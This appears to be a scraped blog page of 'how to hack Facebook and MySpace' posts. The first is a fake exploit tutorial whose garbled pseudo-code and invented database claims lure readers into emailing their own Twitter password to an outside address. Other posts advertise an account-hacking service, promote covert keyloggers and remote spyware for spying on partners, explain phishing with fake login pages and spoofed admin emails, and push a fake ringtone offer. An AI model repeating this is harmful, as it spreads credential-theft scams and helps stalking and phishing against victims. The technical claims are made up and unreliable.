feedburner
Enter your email address:

Delivered by FeedBurner

feedburner count

Learn To Hack Facebook

Labels:

Learn How To Hack Any FaceBook Account Using A Web Based Exploit

Do you want to learn how to hack facebook?, Are you looking for a way to hack your friends facebook account without them fiding out? Interested in finding out ways to hack someones profile? Maybe you want to take a quick peek at their message inbox or use a glitch to use a hacking script. In this article I will show you a fairly easy step by step guide on how to hack facebook user accounts without having to directly hack into facebook and risk getting caught. Ignore all those hacking services, facebook hacks and hackers that charge you money for something you can do on your own for free. Hack the password of any of your friends accounts and get their password even as a prank or joke (you may also be interested in trying our How To Hack Twitter Accounts tutorial).

Hack facebook, hacking facebook passwords from user accounts and find out someones facebook password...Is any of it really possible? Yes it is, thanks to Twitter!. By now, you have probably heard the rumors of how unsafe Facebook is with a few celebrities having had their accounts hacked. You may also have seen Twitter allows you to synchronize your tweets with Facebook status updates so whatever you tweet appears as a Facebook status update. In providing this service, Facebook has created many vulnerabilities for itself by allowing a third party (Twitter) to access their database. This problem is due to Facebooks API service which permits exterior websites or applications (like FarmVille) to modify or post stuff on your profile.

A couple of month's ago I wanted to check my old FaceBook account but forgot what email and password I had used to sign up, I sent an email to their technical support but they didn't reply so I decided to put my geek skills to good use and find a way to get my login information back by writing a facebook account hacking code or exploit as they are called.
HOW HACKING FACEBOOK ACCOUNTS WORKS
Facebook has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.

If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.

So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned FaceBook uses something similar to an email service to contact their databases.

For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password).

Luckily for us, as mentioned above, through the use of Twitter combined with Facebooks 'Mutual Friend' feature, we can use a friends account to verify your own, in other words, if the person you want to get the login information from is on your friends list on Facebook...you can use your Twitter account to verify your their friend on Facebook taking advantage of the vulnerability of the twitter status sync exploit, and get their login email and password sent to you. But the victim must be on your friends list on Facebook.
HOW TO DO IT
1) First off you will need to get your user id and the victims user id, how do you do this?

Go to the victims profile, then click on their Display Picture (not the "View Photos of ..." link or tab but the actual main picture of their profile) and look at your browsers address bar, at the end of all the address you should see a group of numbers that should you should look something like this: (I have used a red arrow to point them out)



Don't worry if it isn't exactly like that (sometimes it has variations like; 'album.php?profile=10957800008') just as long as you get the numbers. Write them down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.

Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the facebook user id of the victim and the twitter friend authentication information. I will give you step by step examples by trying the exploit code on my friend Laura's account as the victim, see what parts you have to edit and with what:



1. Should be the victims user id.
2. Should be your twitter login Username (I put my email in the screencap example above for privacy reasons) to verify your the victims mutual friend on facebook. Make sure your facebook email was the same used to sign up to Twitter so the exploit script can automatically connect both accounts.
3. Should be your twitter password so the database can authentic you really are friends with the victim on facebook.

When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email we will have to use a special Subject so the database knows how to read it in programming language.

Go to your email address and Compose a new email to fbsupport@techie.com which is their customer service email for forgotten passwords, in the Subject copy and paste the code below highlighted in gray:
$[search_database = $find user+id= "123456789", '%verification+user+bday' = }"01/01/1900"{ begin_search();


Once you have edited the Subject and entered the email address, your Composed email should look like the screenshot below, I will numerate each item: 

 

1. The email address of the facebook database's forgotten password customer service.
2. This is where you insert the victims facebook user id.
3. This is where you insert your birthday so the database can find you to verify your a friend of the victim (it arranges users in the database based on your date of birth), NOTE: It MUST be in the MONTH/DAY/YEAR format so it can read it properly.
5) After you have correctly written the To: and Subject sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email.Now all you have to do is click Send and wait for the database to send you back it's reply with the information.

It should take from 12-24 hours depending on the traffic FaceBook has that day, this is a sample of the email response you'll receive:

THE EXPLOIT CODE
fb_select_db("find", $linkID) or die(fbdatabase_error());
$resultID = fb_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(fbdatabase_error());

$num_rows = db_num_rows($resultID);
$row = facebook_fetch_array($resultID);
$user_id = $row[0];

if ($user_id == "PUTUSERIDHERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that ID.
}
else {
// print "We're sorry, your friend ID does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%friend_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "PUTEMAILHERE"; (%friend_vulnerability_email%)
#user password = "PUTPASSWORDHERE"; (%friend_vulnerability_pass%)
$friend_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {
   echo $empty_fields_message;
function decrypt userID password() {
     $salt = "abchefghjkmnpqrstuvwxyz0123456789";
     srand((double)microtime()*1000000);
     $i = 0;
     while ($i <= 7) {
             $num = decrypt() % 33;
             $tmp = substr($salt, $num, 1);
             $pass = $pass . $tmp;
             $i++;
    }
    return $pass;
  }

mail($email_address, $subject, $message, "Facebook Password Reset Confirmation


}
/end$






Hack Facebook Password

Labels:

Have a Facebook Account you need hacked? Great, that’s what we’re here for. Hack FacebookPassword is the only site on the web that will actually usually provide you with full access to your Facebook account you provide us with. Just give us a link to the account and we will tell you how you can hack Facebook!
Many sites on the web claim to be able to provide Facebook hacks. To provide you with the short but blunt truth, most of these sites do not work. I can tell you now that as far as we can see, we are the only site who know how to provide Facebook hacks!
Our methods aren’t actually that difficult, good password recovery is taught amongst most industry professionals, we’re just sharing some of this info on to you!
So far we have worked with over a hundred private individuals; gaining them access to their lost accounts. Now however, we have opened up this to the public as a means of good password recovery (we know how frustrating it can be to lose your password).




Hack Facebook Account

Labels:

Looking to hack Facebook? If you then you have come to the right place. Hack Facebook Password is the only site on the web which will grant you access to any Facebook account absolutely free of charge.
That’s right people, 100% free. Should you have lost your account password, do not worry, because there are methods of recovering your password.
Facebook has become the number 1 social networking site, so as you could imagine we get a tonne of individuals coming to us pleading us to recover lost passwords.
Our success rate so far is around 90%, and we have now opened up this service to the public. So if you need to gain access to a lost Facebook account, now you can. Remember, this service is completely free. All you need to provide us with is the link to the account of yours, and we will do our best to help you gain access to it using our unique software.




How to Hack MySpace Accounts

Labels:

MySpace is usually a goldmine for juicy information and cheating messages goin on in one’s life. I personally found my girlfriend had cheated on me by discovering a myspace message in her inbox (rather, she forgot to delete her trash) – she was arguing with a guy about how he contracted an STD.. I couldn’t believe it. I got tested and thankfully I was completely clean, but I learned a valuable lesson about trust. As you can see and probably understand, knowing the truth is very important and many others agree.. even though there are others that say it is unethical. I say when it comes to your health and happiness the most ethical thing is to take care of yourself. It is very common for them to flirt, send sexual photos, or even create entirely new myspace accounts to secretly have another relationship – I have heard it all from the people that read my blog. It’s no wonder many people want to know how to hack a myspace account..
I have been experienced with hacking and computers for over 11 years so please, don’t listen to other people that know nothing. There are only 2 ways to effectively hack a myspace:
Spy Software (aka Keyloggers) 
(requires money, but easy and works everytime)
Keylogging is the best method to obtain a myspace password because not only can you capture the password, but you can get ALL of their passwords, store history, and see every piece of information entered on the computer. Keylogging refers to the monitoring of key’s pressed on a keyboard, but a good spy software has many more features such as taking periodic pictures of the computer screen and chat logging. Some spy software does not require you to have physical access to the person’s computer and can be installed over the internet – this is highly popular with soldiers stationed over seas or for hacking friends.
I have tried over 20 different spy software products and there are only a few that haven’t been pressured by “privacy groups” to alert the user that they’re being monitored.
If you live with the person you want to hack, you should check out one of the best keyloggers for PC monitoring called AceSpy. You only need a few minutes with their computer to install it, or you could install this on your own computer and capture the activities of anyone that uses it. This spy software has a ton of features from IM logging, keylogging, screenshots, and everything else you would expect from spy software, but it does it with more emphasis on MySpace monitoring and password capturing. It logs information silently without any alerts and captures every key pressed on the keyboard.
If you don’t live with your target or have access to their computer, it is still possible to hack their myspace password. The only software that works (and works amazingly well) is SniperSpy. SniperSpy is a remote spy software that installs silently on your targets computer. SniperSpy gives you a module that you can send to your target (via email or instant messenger) which when ran will begin monitoring. No physical access to the target’s computer is needed as it simply installs over the internet. SniperSpy also has some amazing special features – you can view their computer screen LIVE from anywhere at anytime via SniperSpy’s website, which means you don’t need to install anything on your computer either to view all the data it collects. You will be able to view the history of chat conversations, web sites visited, and gain access to all the online accounts they log into by searching through the keylogs. It even takes image screenshots of every internet webpage they look at, so that if they are permanently deleting their sent/received myspace messages (like paranoid cheaters), you can still read the messages that have been deleted by looking at the screenshots stored by SniperSpy! This is the program I used to catch my girlfriend, and because i’ve gotten so many questions about it I recently wrote a full review of SniperSpy in which I highly recommend it.

Phishing
(free, but more difficult and technical)
Phishing is basically tricking your target into giving you their login details without them realizing – this is how almost all accounts are hacked by spammers. The most common way this is done is by setting up a “fake login page” which looks identical to the real myspace login page. The hard part is getting the person (or lots of people) to that fake login page, but many tricks and creative ideas used over the years have fooled even the savviest of computer users. Once the victim is on your fake login page and they try to login, the username and password gets emailed to you they get emailed to you and they get redirected to the real myspace login page thinking they mistyped their password. This is essentially the most effective and stealthy way of hacking a myspace account, but requires some technical skills to setup and pull off.
There have been many different ways to show the fake login page to the victim, for example: changing a MySpace layout to look like a login page, invisible “div overlays” that redirected to your fake login page when user clicked somewhere on the page, and most commonly an email can be sent that looks like it came straight from admin@myspace.com telling you to please login and update your password (or theres many other email tricks like fake friend requests). You should not consider this method if you are unfamiliar with computers and the internet, period. There is no software or product for it and you must do it yourself in most cases, and if you decide to pay someone else to do it they will charge a lot and you take a huge risk in getting scammed. If you are interested in hacking a myspace using phishing tecniques, we have put together an ebook with instructions along with a fake login page creator tool. See below>>
We received legal threats to remove the download from our site, so we have had to place a fake ringtones offer in front of it that you must complete in order to view the instructions and download the phishing page creator tool. You will need to enter your cell phone number, confirm the PIN code, and the download link will be texted to you. Download here.





How To Hack (legally) a Myspace Accounts

Labels:


Easy hacks most Myspacers don't know about

These to my knowledge aren't showing up in any books.
When you join myspace you can make your profile private, and its THE ONLY WAY to secure your friends list, your private anything really. If you can do it within the standard features myspace offers (privacy settings for example) then it cannot be bypassed, but if the user has to add code to his/her about me page then its absolutely a deception that this is protected. People draw a false sense of security when using these codes. I discovered it when I was trying to show my friends that nothing is truly safe unless its blocked in the code (from the sourse).
I was determined to figure out how to get at this list to see if I could get at a hidden friends list, pictures etc... Turns out that the codes for myspace pages is unprotected (i.e. not set to private by myspace not codes you enter).
Profiles are always broadcasted. This means as long as you have to enter codes into a box to make the feature happen its still there. It works alot like cable tv. The signal to all of the channels are broadcast in that wire but the box scrambles the unpaid for signals. Well myspace doesnt block anything when you add code, actually whats happening is the whole code comes in like nothing was changed, but your added code is piggie backed onto the myspace base code and its your browser that actually hides the features by telling the browser not to show it.
What happens is the code is appended to change this one word in various places: "Visibility" (so simple its almost an insult huh)


Un- Hiding the entire page! Hack

1. For hiding tables like your friends frame, for changing the look of the page they hide the frame and use CSS (cascading style sheets) to rebuild a new frame), or to wipe the whole page so you can make it look like a web page with no frame boxes. (this is also how they swap the picture to the right side not the left in some designs)
"style="visibility:visible;
then on any thing hidden (also this is all they do to hide anything is flip this code to
"visibility:invisible"
the codes you enter basically append (add to) the format code, as the format code says "visibility:show" or "vidibility:invisible" the codes you enter will add a new line below that updating the read to "Visibility:visible" or "Visibility:show
"